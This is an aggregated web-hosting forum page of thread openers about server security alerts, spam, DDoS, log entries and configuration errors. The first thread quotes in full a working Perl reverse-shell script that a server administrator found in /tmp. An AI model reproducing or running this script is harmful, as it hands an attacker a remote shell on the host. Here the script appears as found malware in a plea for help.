Lfd: Suspicious File Alert

Mar 24, 2008

I got this system email:

Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken

So I looked and the file says this:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!
");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!
");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!
");
connect(SOCKET, $paddr) || die("Error: $!
");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

That one line 'echo "`uname -a`";echo "`id`";/bin/sh';

View 13 Replies


ADVERTISEMENT

Suspicious Processes

Nov 27, 2008

Well one of my servers has been under a DDoS attack for a while and I've been doing things to keep it down but there is a suspicious process that keeps running and I am guessing that is whats keeping the server load up because when I stop apache the load goes down but not for long.

The process is this:

Code:
/opt/adobe/fms/fmscore -adaptor _defaultRoot_ -vhost _defaultVHost_ -app registry -inst registry -tag -conf /opt/adobe/fms/conf/Server.xml -name _defaultRoot_:_defaultVHost_:registry:registry:

Does anyone know what this process is or how to block it?

View 9 Replies View Related

Suspicious Overload And Spammers

Jul 24, 2009

I have a small VPS, with few websites each one with very low visitors in average less than100 visits per day

CentOS 2.6.9
Plesk
PHP 5.1.6
Apache/2.2.3

Few days ago some Forum spammers signed up to one of the forums. One of them: stopforumspam.com/ipcheck/212.178.2.3

Today I was away for few 5 hours after I came back I recived a notice from my script that "SMF could not connect to the database"

I checked and I noticed almost all of my sites are not responding. MySql was working. A script on remote server which uses mysql from my server loaded but with dealy

------------------Next step-------------------
log to SSH
# uptime
# 12:XX:XX up XXX days, 5:06, X users, load average: 10.58, 8.86, 5.86

my normal load is less than 0.9

-----------------check open ports ---------------------------
netstat -nap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 1936/couriertcpd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 32447/mysqld
tcp 0 0 0.0.0.0:106 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 9943/smbd
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 1916/couriertcpd
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 1840/couriertcpd
tcp 0 0 0.0.0.0:8880 0.0.0.0:* LISTEN 9626/httpsd
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 7645/httpd
tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 [MyServerIP]:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 [MyServerIP]:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 [MyServerIP]:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 13619/named
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 13820/sshd
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 14307/xinetd
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN

View 2 Replies View Related

Suspicious Web Logs. Is This An Attack

Jun 17, 2008

I am an administrator/developer for a website and we are using Awstats to get the usage statistics. Lately we are getting hits from a bunch of IP Addresses which differ only in the Host ID part.

For example:

Here are the logs

Address-------Page Views----------Last visit
64.12.116.209----25------------17 Jun 2008 12:22
64.12.110.94------2------------17 Jun 2008 12:20
64.12.116.142----11------------17 Jun 2008 12:20
64.12.116.135----42------------17 Jun 2008 12:19
64.12.116.130----18------------17 Jun 2008 12:17
64.12.116.80-----11------------17 Jun 2008 12:17
64.12.116.139----15------------17 Jun 2008 12:15
64.12.116.132----16------------17 Jun 2008 12:14
64.12.116.210----33------------17 Jun 2008 12:10
64.12.116.208----21------------17 Jun 2008 12:06
64.12.116.144-----3------------17 Jun 2008 12:04
64.12.117.5------22------------17 Jun 2008 12:20
64.12.117.11-----50------------17 Jun 2008 12:16
64.12.117.8------56------------17 Jun 2008 12:08
64.12.117.207----17------------17 Jun 2008 12:07
..
...

Notice how most of the IP addresses are 64.12.116.xxx or 64.12.117.yyy. Similarly I found addresses matching 65.55.109.zzz and a bunch more.

This is making me wonder if this is some kind of an attack (Especially since Awstats seems to say that the hosts list does not include the IP addresses of spiders/crawlers/bots)? We are concerned. Please advise.

The above Hosts List (sorted by Last Visit) was generated by using Awstats our website logs.

View 3 Replies View Related

Highly Suspicious Activity - Log Files

Dec 17, 2007

what to look out for in the log files, but a couple of things jumped out at me over the weekend:

I had 5 of these, I followed the link (I suppose is the referrer) but it takes you to a polish-hosted russian webpage that tries to infect your browser. So DONT VISIT THE WEBSITE unless you're virus checker is fully up to date!

Code:
shop.######.com: [15/Dec/2007:02:52:43 +0000] 87.118.120.23 - - "GET / HTTP/1.0" 200 21466 [url] (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
As this is only a GET, I'm not sure what the purpose of this really was.

Also I seem to be getting loads of these recently:

Code:
shop.######.com: [17/Dec/2007:08:21:41 +0000] 82.19.60.98 - - "GET /_vti_bin/index.php?main_page=page_not_found HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"
Which I read is an automated hacker-bot checking for an unpatched MS server.

So my question is this;

What's the most effective thing we (as webmasters/hosts) can do to combat and report this sort of thing so we fight back against what's likely to be related to organised crime?

View 4 Replies View Related

SSH Alert

Feb 8, 2008

I dont know if this has been asked before. Anyway what I want to accomplish is I want an email be sent to my email address everytime someone connects to my SSH. I want an email sent regardless it was a successful or failed login. Is there a step by step tutorial for this.

View 5 Replies View Related

LSM Alert

Mar 3, 2008

I just received this alert, can anyone tell me what that means?

I did not install anything...

> tcp 0 0 IP:19848 0.0.0.0:* LISTEN -
> tcp 0 0 IP:19900 0.0.0.0:* LISTEN -
> tcp 0 0 IP:22812 0.0.0.0:* LISTEN -
> tcp 0 0 IP:24924 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27411 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27542 0.0.0.0:* LISTEN -
> tcp 0 0 IP:29077 0.0.0.0:* LISTEN -
> tcp 0 0 IP:32895 0.0.0.0:* LISTEN -
> tcp 0 0 IP:36635 0.0.0.0:* LISTEN -
> tcp 0 0 IP:46277 0.0.0.0:* LISTEN -
> tcp 0 0 IP:47068 0.0.0.0:* LISTEN -
> tcp 0 0 IP:51199 0.0.0.0:* LISTEN -
> tcp 0 0 IP:52752 0.0.0.0:* LISTEN -
> tcp 0 0 IP:56869 0.0.0.0:* LISTEN -

View 0 Replies View Related

Alert Notification In Lfd

Apr 30, 2008

I installed csf: v3.28 on my server .

Where is this email configurable? I have seen this email alert notification in the logs numerous times but have yet to receive any alert emails from CSF/LFD.

View 1 Replies View Related

Relay Alert

Jun 5, 2008

i have this notification that keeps coming from the same ip at least 10 or 20 times a day since 3 days aprox. dunno what it is...

this is the message:

Quote:

subject: lfd on nameserver.domain: RELAY Alert for 200.27.xxx.xxx (domain.cl)

body:

Time: Thu Jun 5 10:56:19 2008
Type: RELAY, Remote IP - 200.27.xxx.xxx (domain.cl)
Count: 101 emails relayed
Blocked: No

Sample of the first 10 emails:

2008-06-05 10:19:56 1K4GJo-00040m-Rf <= 3eseofertas@gmail.com H=(mail.gmail.com) [200.27.xxx.xxx] P=esmtp S=1738 id=20080605102044.5323CE2BEB4A1707@gmail.com T="Especial Empresas STGO - CCTV -Evaluacion en Terreno sin Costo."

it looks like spam... is my server sending spam or im receiving it?

View 2 Replies View Related

Downtime Alert

Jul 13, 2007

I have many domains and webservers. so it's hard to monitor everything usually. i heard there are some websites and softwares to do this.

does windows 2003 have anything default like this ? or can anyone suggest the application for my windows 2003 server? which sends alerts if any error is going on my server?

Also there any other websites which is doing this monitoring? because i have some shared accounts and i want to monitor it too.

View 5 Replies View Related

VPS QoS Alert - Memory

May 30, 2007

please check the following screnshot

[url]

this is way better, my server goes up for 10-20 minutes then I have to hit restart from the virtouzzo, becuase the server simply goes dead. nothing loads..

how can I know which site on my vps is causing trouble and how to fix it?

View 3 Replies View Related

LSM Alert On Server

Feb 13, 2007

I am getting on every 10 minutes mails like that from my server every one has different ports

Quote:

This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
> tcp 0 0 ************:3262 0.0.0.0:* LISTEN

Quote:

This is an automated alert generated from *************. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
> tcp 0 0 *************:53007 0.0.0.0:* LISTEN -

Quote:

This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
> tcp 0 0 ***********:44543 0.0.0.0:* LISTEN

How can i find why this is coming? My managment company said me that a script is tryig to open a socket but we couldnt find the script. Is there any people here have like a similar issue or how can i find and solve this?

View 2 Replies View Related

SCAM Alert : Hajto.com.pl

Apr 16, 2009

has anyone purchased a server from the op and received it yet?

View 14 Replies View Related

Alert For Fella Hosts

Apr 10, 2008

In less than 5 mins of account activation user named Paul McGrath, supposedly from NY. Allegedly using lolchurch.com domain (that domain was never forwarded to our server) and user just put a script called send.php and let it rip.

Good thing i was around and management looked at it within minutes (AcuNett).

So, watch for this user signing up and check account(if using that user name or similar domain or recent signups) for any such php page.

Now asks us for refund for suspending his site for spamming.. Asked for his driver license copy to first verify his address, so possibly i can report to paypal for possible fraud too or some online internet police maybe for fraud if there is such a police

Note to Mods. not sure where threads like these go to!

Quick edit: Now user trying to threaten us to give their refund cause they want it back for they spammed and deserve a refund for the same.

"Your servers were awful anyways, I maybe sent 500 emails? I'm gonna ask nicely before I actually do something about this, give me a refund."

he forgot 500 emails in less than 5 mins. does not look like not-spam. Anyways i go have some chat with the fraud, id does not match paypal payment id

View 14 Replies View Related

Error :: Alert: No_kernel_support_for_openvz_check_if_right_kernel...

Mar 25, 2009

why its doing this when i try create a vps?

Quote:

Alert: no_kernel_support_for_openvz_check_if_right_kernel...

Quote:

[root@box ~]# cat /etc/grub.conf
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,0)
# kernel /vmlinuz-version ro root=/dev/sda5
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (2.6.18-92.1.22.el5)
root (hd0,0)
kernel /vmlinuz-2.6.18-92.1.22.el5 ro root=LABEL=/
initrd /initrd-2.6.18-92.1.22.el5.img
[root@box ~]#

Quote:

[root@box ~]# rpm -qa | grep kernel
kernel-2.6.18-92.el5
kernel-devel-2.6.18-92.el5
kernel-2.6.24.5grsechostnoc4.0.0x86_64libata-1
kernel-headers-2.6.18-92.1.22.el5
kernel-devel-2.6.18-92.1.22.el5
kernel-2.6.18-92.1.22.el5
[root@box ~]#

Have tried running:

yum -y install ovzkernel.x86_64

Quote:

Installing: ovzkernel ######################### [1/1]
Error unpacking rpm package ovzkernel - 2.6.18-92.1.18.el5.028stab060.2.x86_64
error: unpacking of archive failed on file /lib/modules/2.6.18-92.1.18.el5.028stab060.2/kernel/arch/x86_64/crypto/aes-x86_64.ko;49c8f08e: cpio: write

Installed: ovzkernel.x86_64 0:2.6.18-92.1.18.el5.028stab060.2
Complete!

View 3 Replies View Related

Fraud Account Alert

Jul 3, 2008

I've gotten two fraudulent signups from the following ip address:
206.53.49.**

Luckily, maxmind has caught him both times, but he's using an address from canada and the phone is fake but the domains he's using are real.

I've gone ahead and blocked the ips, but I just wanted to let you guys know.

View 14 Replies View Related

Email Phishing Alert

Apr 26, 2008

Gmail has a feature to detect email phishing and it marks them with a red header alert saying "Warning" This message may not be from whom......", I believe this red alert has nothing to do with spf record of that email, so how does it detect it as phishing email?

We have spf record and I sent an email from another server, when I received that emai the spf record was "softfail" but it does not have that red alert.

View 0 Replies View Related

Shell Script Alert

Jun 7, 2007

how i can secure vps from this kind of script and known when someone upload shell script. How do I set the alert so I get to know that someone has uploaded a script on the server

View 3 Replies View Related

Alert: Open DNS Server

Apr 16, 2007

I've run "DNS report" test for one hosting in dnsstuff.com and got this warning (as some times before for other hosts:

---------------------
Fail:
Open DNS server

ERROR: One or more of your nameservers reports that it is an open DNS server. This usually means that anyone in the world can query it for domains it is not authoritative for (it is possible that the DNS server advertises that it does recursive lookups when it does not, but that shouldn't happen). This can cause an excessive load on your DNS server. Also, it is strongly discouraged to have a DNS server be both authoritative for your domain and be recursive (even if it is not open), due to the potential for cache poisoning (with no recursion, there is no cache, and it is impossible to poison it). Also, the bad guys could use your DNS server as part of an attack, by forging their IP address.
-----------------------

Is this anythhing important?

View 3 Replies View Related

Strange Error : Alert: File_exists_not_owned

Jun 9, 2009

strange error : Alert: file_exists_not_owned

file_exists_not_owned [/home/admin/lc//index.html]

this error gets displayed, when trying to edit any file (suitable filename ) via Kloxo

I checked the chmod permission it was 755, still I was unable to edit file via Kloxo

any suggestions on why this problem and how to overcome this?

View 3 Replies View Related

Software To Alert Me Using Sms Or Email When Server Is Down

Mar 28, 2009

Is there any software to alert me using sms and email when my server is down?

I know a few good online solutions but i want to test also a solution from my pc.

View 4 Replies View Related

E-mail Alert On Root SSH Login

Jun 3, 2009

Want to be notified instantly when someone logs into my server as root With date time & local IP address

View 12 Replies View Related

[Security Alert] - WHMCS Users

May 19, 2008

this is not a WHMCS vulnerability, & you are most likely not affected if you have used the Further Security Tutorials, given by WHMCS.

1.) What has happened?

A professional hacker, signs up as a client, & adds a shell script to your attachments/downloads folder.
He gains complete access to your WHMCS admin, & changes your paypal & other gateway emails/accounts, to his emails/accounts.

2.) What to do?
Check your attachments/downloads folders, for any such scripts.
Use - [url]Furthur_Security_Steps to secure it.

Go to Payment Gateways, & check if the accounts are yours.

3.) How do I know so much about this?
Our installation, was also hacked. But, this hacker made a mistake.
He used his email account password, for signing up. I could get into his email, & see who has been hacked. I could also get into his PayPal & Egold, & refund all payments intended to go to LaceHost (me). I saw other host's payments too.

4.) Hacker has changed his modus operandi.
He now changes the paypal, to some other host's paypal, instead of his.
He also deleted tables from your database, may create a new administrator account, may modify other accounts, add affiliate commission etc.

5.) For more information on this hacker,
Add me on IM - lacehost [dot] live1 [at] yahoo [dot] com

6.) How many have been hacked?
According to what I saw in his PayPal, & his email, atleast 15 hosts have been hacked.

If your paypal has been changed to some other host's paypal, please do not blame them for hacking, we really do not need an inter-industry war here

View 14 Replies View Related

Lfd: High 5 Minute Load Average Alert - 6.37

Mar 21, 2008

I use CSF on a VPS with 512 RAM and 1024 Busrt and the other day I received the below notification. My hostsaid it was Mailman and since I don't use mailing lists the recommendationwas to disable it. So I did. I'm curious tho as to why this happened in the first place.

Time: Wed Mar 19 17:53:33 2008
1 Min Load Avg: 11.41
5 Min Load Avg: 6.37
15 Min Load Avg: 2.70
Running/Total Processes: 12/94 ...............

View 0 Replies View Related

Plesk 12.x / Linux :: Deny User Upload File Via File Manager Or Hidden File Tab?

Feb 10, 2015

I'm build Plesk Panel for Linux and Presence Builder, I don't want my user can upload their website to hosting via File Manager. How can I do it...

View 2 Replies View Related

1.com/file.php, 2.com/file.php Where File.php Is Hosted On Main.com/file.php

May 26, 2008

Say I have 2 websites and they all use file.php which is located on mainserver.com/file.php.

I want to use the file like this:
website1.com/file.php
website2.com/file.php

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved